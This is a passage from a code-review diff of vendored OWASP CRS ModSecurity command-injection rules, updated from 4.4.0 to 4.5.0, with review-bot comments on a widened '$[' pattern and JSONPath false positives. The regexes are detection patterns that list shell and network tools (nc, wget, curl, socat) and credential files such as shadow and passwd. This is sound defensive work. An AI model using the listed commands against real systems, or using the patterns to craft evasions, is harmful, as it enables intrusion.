?:ofe
tch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\x0b&\)<>\|]|map|o(?:de[\s\x0b&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\x0b&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\x0b&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\x0b&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\x0b]|3?versions))|r(?:ak(?:e[\s\x0b&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\x0b&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\)<>\|]|user)|nano|oute[\s\x0b&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|nap)[\s\x0b&\)<>\|]|diff|e(?:(?:lf|rvice)[\s\x0b&\)<>\|]|ndmail|t(?:arch|env|facl[\s\x0b&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\x0b&\)<>\|]|u(?:f|tdown[\s\x0b&\)<>\|]))|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\x0b&\)<>\|])|mux|ouch[\s\x0b&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\x0b&\)<>\|]|gr|mdiff|pw|rsh|sudo)|olatility[\s\x0b&\)<>\|])|w(?:a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:athura|c(?:at|mp)|diff
|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c
]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|nsible|pt(?:-get|itude[\s\x0b&\)<>\|])|r(?:ch[\s\x0b&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\x0b&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>
\|]|tab))|s(?:cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\x0b&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\x0b&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\x0b&\)<>\|]|grep|i(?:le(?:[\s\x0b&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\)<>\|])|o(?:ld[\s\x0b&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\x0b&\)<>\|]|core|e(?:ni(?:e[\s\x0b&\)<>\|]|soimage)|tfacl[\s\x0b&\)<>\|])|hci|i(?:mp[\s\x0b&\)<>\|]|nsh)|r(?:ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|dconfig|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\x0b&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ke[\s\x0b&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\x0b&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\x0b&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\x0b&\)<>\|]|map|o(?:de[\s\x0b&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cma
n|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\x0b&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\x0b&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\x0b&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\x0b]|3?versions))|r(?:ak(?:e[\s\x0b&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\x0b&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\)<>\|]|user)|nano|oute[\s\x0b&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|nap)[\s\x0b&\)<>\|]|diff|e(?:(?:lf|rvice)[\s\x0b&\)<>\|]|ndmail|t(?:arch|env|facl[\s\x0b&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\x0b&\)<>\|]|u(?:f|tdown[\s\x0b&\)<>\|]))|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\x0b&\)<>\|])|mux|ouch[\s\x0b&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\x0b&\)<>\|]|gr|mdiff|pw|rsh|sudo)|olatility[\s\x0b&\)<>\|])|w(?:a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ "id:932235,\ phase:2,\ block,\ 
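Review bot: The new 932235 expression is a generated pattern that, as far as the visible text shows, differs from the removed one only in `\$(?:\(\(?|\{)` becoming `\$(?:\(\(?|[\[\{])`, so a bare `$[` (presumably meant to cover the old `$[expr]` arithmetic-expansion form) now counts as a command prefix alongside `$(` and `${`; nothing in the hunk records which upstream CRS tag or commit this copy was taken from. Because the rule files appear to be vendored verbatim (the `ver:'OWASP_CRS/4.5.0'` tag), a reader cannot distinguish a faithful copy from a hand-edited one, and a hand edit to this multi-kilobyte regex would be silently lost on the next sync. Record the upstream tag and commit in the PR description and compare the copied files against the published release archive (and its checksum or signature) before merging; any change to the pattern itself belongs in the upstream regex-assembly source, not in this file.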
@@ -45,7 +45,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -86,11 +86,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\}|\[.*\])|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \
 "id:932130,\
 phase:2,\
 block,\
@@ -106,7 +106,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/88',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
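Review bot: The widened 932130 pattern `\$(?:\((?:.*|\(.*\))\)|\{.*\}|\[.*\])` now matches any value containing `$[` followed later by `]`, which is also the JSONPath root-array form (`$[0].id`, `$[?(@.active)]`) that API clients commonly send in filter or query parameters; since the rule scores into `tx.inbound_anomaly_score_pl1`, the bump can start blocking such requests at the default paranoia level. The regex is upstream CRS and should not be altered in this copy, but deployments that accept JSONPath in arguments need a local target exclusion loaded after the rules, e.g. `SecRuleUpdateTargetById 932130 "!ARGS:filter"`, scoped to the parameters concerned. A sentence in the PR description telling operators to watch for new 932130 hits after upgrading would make this change safer to roll out.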
@@ -126,11 +126,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\
